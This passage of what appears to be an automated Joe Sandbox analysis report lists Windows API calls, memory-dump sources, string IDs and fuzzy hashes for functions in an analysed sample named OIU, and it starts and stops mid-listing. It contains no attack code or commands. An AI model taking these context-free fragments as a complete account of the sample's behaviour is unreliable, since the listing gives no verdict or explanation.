                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend_wcslen
                                                                      • String ID:
                                                                      • API String ID: 455545452-0
                                                                      • Opcode ID: 5f83bc062c542861c8e645d9ffbd277a75cc0a38fa73708f99cc852d6b894ab5
                                                                      • Instruction ID: bcd60e81419745a77166ab89adb6a4098cc9513ada2ce302c52970f1839e219e
                                                                      • Opcode Fuzzy Hash: 5f83bc062c542861c8e645d9ffbd277a75cc0a38fa73708f99cc852d6b894ab5
                                                                      • Instruction Fuzzy Hash: 0F11B1B16206189ADB20DF658C86BEE77BCAF11760F50406AF925D6181EB708B80CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C01A47
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A59
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A6F
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 050af3e10a543b592f07ed3d59a445f24eb7956903b2c76e1e3e766eb9a7616d
                                                                      • Instruction ID: 57961d7aec1394256abeabe10ff5804486d9bc5bf038ae1b6a6c40831c1c17ce
                                                                      • Opcode Fuzzy Hash: 050af3e10a543b592f07ed3d59a445f24eb7956903b2c76e1e3e766eb9a7616d
                                                                      • Instruction Fuzzy Hash: 4011F73AA01219FFEB119BA5CD85FADFB78EB08750F240091EA14B7290D6716F50EB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C0E1FD
                                                                      • MessageBoxW.USER32 ref: 00C0E230
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C0E246
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C0E24D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                      • String ID:
                                                                      • API String ID: 2880819207-0
                                                                      • Opcode ID: 44c75edaaa2febe3055fe899ece7e5daf2cb950b20b12cc21b8fb77135674053
                                                                      • Instruction ID: fcdb60e9f40711340f5460e1b142060804228063922daf3f146eea440bf6f1b9
                                                                      • Instruction Fuzzy Hash: 5311C876904254BBC7019BAC9C49B9E7FAC9B45324F044669F924E32D1D670CA44C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,?,00BCCFF9,00000000,00000004,00000000), ref: 00BCD218
                                                                      • GetLastError.KERNEL32 ref: 00BCD224
                                                                      • __dosmaperr.LIBCMT ref: 00BCD22B
                                                                      • ResumeThread.KERNEL32(00000000), ref: 00BCD249
                                                                      Similarity
                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 173952441-0
                                                                      • Opcode ID: 28f15ff2a8e5e30287cf0f073ddf3d8f00d9a52db8e2b0884b4e7ca187236b76
                                                                      • Instruction ID: 616595278a69d60f055009694e05547546e177fc8e3851d5b7a4d81a3b9d1e30
                                                                      • Instruction Fuzzy Hash: DE01D67A4051047BC7115BA5DC49FAE7AEDDF81331F1002ADF925AA1E0DB70C901D7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateWindowExW.USER32 ref: 00BA604C
                                                                      • GetStockObject.GDI32(00000011), ref: 00BA6060
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      • Opcode ID: 88cc219026a49f027aeece8a36279a3f6129530f1d5fe671fa19ab642fb9eb79
                                                                      • Instruction ID: 505170ae86fbcb30247c9235bd58e2cf8ed8768269fa9bdb2e20225ef826aeff
                                                                      • Instruction Fuzzy Hash: A61161B2505549BFEF264FA49C84FEE7BA9EF0A354F090155FA1452110D7329CA0EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00BC3B56
                                                                        • Part of subcall function 00BC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00BC3AD2
                                                                        • Part of subcall function 00BC3AA3: ___AdjustPointer.LIBCMT ref: 00BC3AED
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00BC3B6B
                                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00BC3B7C
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00BC3BA4
                                                                      Similarity
                                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                      • String ID:
                                                                      • API String ID: 737400349-0
                                                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                      • Instruction ID: 9cd57fbded81cc45a84f9107489d06b73e5915930c558d470c172a5c4bcf4694
                                                                      • Instruction Fuzzy Hash: C3011732100148BBDF125E95CC42EEB7BEDEF58B54F448098FE4856121C732E9619BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C0747F
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C07497
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C074AC
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C074CA
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: a3fc5e462275e39806ecf160ed55b41c607037c75e2688191f01d68b4b093142
                                                                      • Instruction ID: 83418bb90f4861146e5286638e10f46c4b93d29b7d65cf66817ba4ae1d953ba0
                                                                      • Instruction Fuzzy Hash: 2E11C4B5A053149FE7208F94DC48FAA7FFCEB00B00F108669A666D6191D7B0F944DF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0C4
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0E9
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0F3
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B126
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: a93d38b4faee127a171df01743514cfa5c56ba0cece8551efd8f7b332897e283
                                                                      • Instruction ID: 418d68d1ed86753bbe163a4795936f45b58a11f62645bf22c1c81449d8efdcad
                                                                      • Instruction Fuzzy Hash: 91113971C01928E7CF00EFA5E998BEEBB78FF19711F104085DA51B2181CB309A60DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSysColor.USER32 ref: 00BB98CC
                                                                      • SetTextColor.GDI32(?,?), ref: 00BB98D6
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00BB98E9
                                                                      • GetStockObject.GDI32(00000005), ref: 00BB98F1
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                                      Similarity
                                                                      • API ID: Color$LongModeObjectStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1860813098-0
                                                                      • Opcode ID: 4b24206c40f967b7e1ee0692b8fbfb354aba643e1f2f40f9ebad956030a36136
                                                                      • Instruction ID: 97ed17d70d1a1e0cc90f8b9e2cb4bd75c155870085e2483ecbf5f99e71a8551a
                                                                      • Instruction Fuzzy Hash: B50168336862109BC7128F25ECA5FFE3BA0DB66765B09009DF782DB2A1CBB54981C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00C02DDD
                                                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 00C02DE4
                                                                      Similarity
                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 2710830443-0
                                                                      • Opcode ID: c9c52c2a7482a42d1d8b89ee3733b6db7c29eeb9a69e913ba47eb2e097670057
                                                                      • Instruction ID: f6f4c6068fa098152cdf3f5f61360fa50b29884920f52dc2a281d1323378ca56
                                                                      • Instruction Fuzzy Hash: 23E01271511724BBDB201B739C8EFEF7E6CEF56BA1F400115F505E10909AA5C941D7B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00BB9693
                                                                        • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                                        • Part of subcall function 00BB9639: BeginPath.GDI32(?), ref: 00BB96B9
                                                                        • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C38887
                                                                      • LineTo.GDI32(?,?,?), ref: 00C38894
                                                                      • EndPath.GDI32(?), ref: 00C388A4
                                                                      • StrokePath.GDI32(?), ref: 00C388B2
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: d9c9373388bdf2cea086e0ad96db27897078d0799bb066647faee617e0b802b9
                                                                      • Instruction ID: cb04907acd1de4c003d39435b199a5d88053c01d3bf1a17d706b81b102169c1f
                                                                      • Instruction Fuzzy Hash: 4AF03A36055658BADB126F98AC09FCE3B69AF06710F048000FB12750E2C7B55651DBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Color$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 4037423528-0
                                                                      • Opcode ID: 09848b27196b1ca2b084e286c1bfa038ee74779f33d45d4e4fa20c39bfb30433
                                                                      • Instruction ID: b68195b43489252511bda0ed74c57f76570a7fc7e9d3bebc020e2ac3b7fe46db
                                                                      • Instruction Fuzzy Hash: BDE06531254244AEDB215B74AC49BEC3F60EB11335F048259F7F5650E1C7714644AB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00C01089,?,?,?,00C011D9), ref: 00C01634
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0163B
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C011D9), ref: 00C01648
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0164F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 74efa4270091606be8100f6f508a2d9658c1cb9f7382123b06c7f536d7a5b27f
                                                                      • Instruction ID: cf4c3348cc1877c5daed7b1877e49d3afe94742b7e078e3abac7f937259ec3c1
                                                                      • Opcode Fuzzy Hash: 74efa4270091606be8100f6f508a2d9658c1cb9f7382123b06c7f536d7a5b27f
                                                                      • Instruction Fuzzy Hash: 0DE08C32612211EBD7201FA0AE8DB8F7B7CEF447A2F188808F655E9090E7358544CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00BFD858
                                                                      • GetDC.USER32(00000000), ref: 00BFD862
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BFD882
                                                                      • ReleaseDC.USER32(?), ref: 00BFD8A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 7262bf3a4840767c1e63ca3cfeaf04fa468ab0ddfb5aa5f5ec1bef0ae7e0a18f
                                                                      • Instruction ID: cb6f619aac62b18cbf8b7640cacc2efe2ad4cb9ae9ae08284dd15beed07017db
                                                                      • Opcode Fuzzy Hash: 7262bf3a4840767c1e63ca3cfeaf04fa468ab0ddfb5aa5f5ec1bef0ae7e0a18f
                                                                      • Instruction Fuzzy Hash: 53E0E5B1810204DFCB41AFA0D88976DBBF2AB08310F108049F856A7260C7398905AF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00BFD86C
                                                                      • GetDC.USER32(00000000), ref: 00BFD876
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BFD882
                                                                      • ReleaseDC.USER32(?), ref: 00BFD8A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: cb0364d3a3770563c6055c6cca38ad935e2a51238827ccb01190445c81d37970
                                                                      • Instruction ID: dbdbc3563191a9768c86078632e61a9e83281ce22ffd3c1cb4049ece75dc3d20
                                                                      • Opcode Fuzzy Hash: cb0364d3a3770563c6055c6cca38ad935e2a51238827ccb01190445c81d37970
                                                                      • Instruction Fuzzy Hash: 95E012B1810200EFCB40AFA0D88D76DBFF1BB08310F108048F85AF7260CB389901AF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C14ED4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Connection_wcslen
                                                                      • String ID: *$LPT
                                                                      • API String ID: 1725874428-3443410124
                                                                      • Opcode ID: a1a6038c730af7b76d57b42ab58871a68530e28bf4db83a9dd9ea228fc66704e
                                                                      • Instruction ID: d86817c19c2b9f8948324cd0fad8c0833a973262111e00f06d1de6643558f259
                                                                      • Opcode Fuzzy Hash: a1a6038c730af7b76d57b42ab58871a68530e28bf4db83a9dd9ea228fc66704e
                                                                      • Instruction Fuzzy Hash: F8915175A042049FCB18DF98C494EE9BBF1BF46304F198099E41A9F392D731EE86DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00BCE30D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: eaa165182c4134573245f3cd454d262ced0853cf536c95a1786993e1fa2b6902
                                                                      • Instruction ID: de6120ff4715f0bac8d1289c299f3a3f8154be91922a9b84c457209922f2bc7a
                                                                      • Opcode Fuzzy Hash: eaa165182c4134573245f3cd454d262ced0853cf536c95a1786993e1fa2b6902
                                                                      • Instruction Fuzzy Hash: 84517BA1A4C201D7DB167714C942BFDABE8EB40740F6449EEF0A5863A9FF34CC859A46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: b519695c84752ed5e97e4d638c6b147bd6c1d9816107c9799afeadedb463c193
                                                                      • Instruction ID: ac4c021884c078cf4735990cedd3997807001cdabe35f301a15e8e3288b7266a
                                                                      • Opcode Fuzzy Hash: b519695c84752ed5e97e4d638c6b147bd6c1d9816107c9799afeadedb463c193
                                                                      • Instruction Fuzzy Hash: CD510F7550424A9FDB15EF28C081AFE7BE4EF16310F2440E5E9A19B2E0DA74DD46CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00BBF2A2
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BBF2BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 31edefd3ff915d871abf4dc2b349ac77c0ba1ae147ee03559006b058ec49e055
                                                                      • Instruction ID: 20a9d03745f036afe3067ad962ee0e52df544b37c577cc08a34bf989ab0a1279
                                                                      • Opcode Fuzzy Hash: 31edefd3ff915d871abf4dc2b349ac77c0ba1ae147ee03559006b058ec49e055
                                                                      • Instruction Fuzzy Hash: 4551237241C7449BD320AF10DC86BAFBBF8FB85300F81889DF199511A5EB718569CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_wcslen
                                                                      • String ID: CALLARGARRAY
                                                                      • API String ID: 157775604-1150593374
                                                                      • Opcode ID: bd9ec67f2070c2d95cdcce29aad87ecfd7b5b212cdcef0048493926ce8163813
                                                                      • Instruction ID: 5f9e55dbcfaffabfd8b53fe8a4017276893b158f46b6d92c17cb1aa965e0f98b
                                                                      • Opcode Fuzzy Hash: bd9ec67f2070c2d95cdcce29aad87ecfd7b5b212cdcef0048493926ce8163813
                                                                      • Instruction Fuzzy Hash: 3B41E131E002199FCB04DFA9D8819FEBBF4FF59324F104069E415AB291E7B09E81CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C1D130
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C1D13A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: 4d7cbc6de79bdf7754114fc502bfe41fa4797ff51a9255fd7094403108070e93
                                                                      • Instruction ID: 1c692efbab8562a6a57be018727d26126869ebc921a963636188c7974e26314d
                                                                      • Opcode Fuzzy Hash: 4d7cbc6de79bdf7754114fc502bfe41fa4797ff51a9255fd7094403108070e93
                                                                      • Instruction Fuzzy Hash: 90313E71D00219ABCF15EFA5CC85EEEBFB9FF06350F100059F825A6161D735AA46DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DestroyWindow.USER32 ref: 00C33621
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00C3365C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: d0efb8c326343408af56ac1c7b74845faff47c279ecd37286ecb56398b3795d6
                                                                      • Instruction ID: ef2808cdfc1f5453755a7530b46a9b1b97ff1d7d7888187d3c0f755383a8ff3a
                                                                      • Opcode Fuzzy Hash: d0efb8c326343408af56ac1c7b74845faff47c279ecd37286ecb56398b3795d6
                                                                      • Instruction Fuzzy Hash: F9318B71120244AEDB209F28DC81FFB73B9FF88724F009619F9A5D7290DA35AE91D760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C3461F
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C34634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BE33A2
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BA3A04
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                                      • String ID: Line:
                                                                      • API String ID: 2289894680-1585850449
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C3327C
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C33287
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: HANDLE$PQ
                                                                      • API String ID: 176396367-2463900637
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA600E: CreateWindowExW.USER32 ref: 00BA604C
                                                                        • Part of subcall function 00BA600E: GetStockObject.GDI32(00000011), ref: 00BA6060
                                                                        • Part of subcall function 00BA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C3377A
                                                                      • GetSysColor.USER32 ref: 00C33794
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C1CD7D
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C1CDA6
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32 ref: 00C334AB
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C334BA
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C06CB6
                                                                      • _wcslen.LIBCMT ref: 00C06CC2
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: STOP
                                                                      • API String ID: 1256254125-2411985666
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C01D4C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
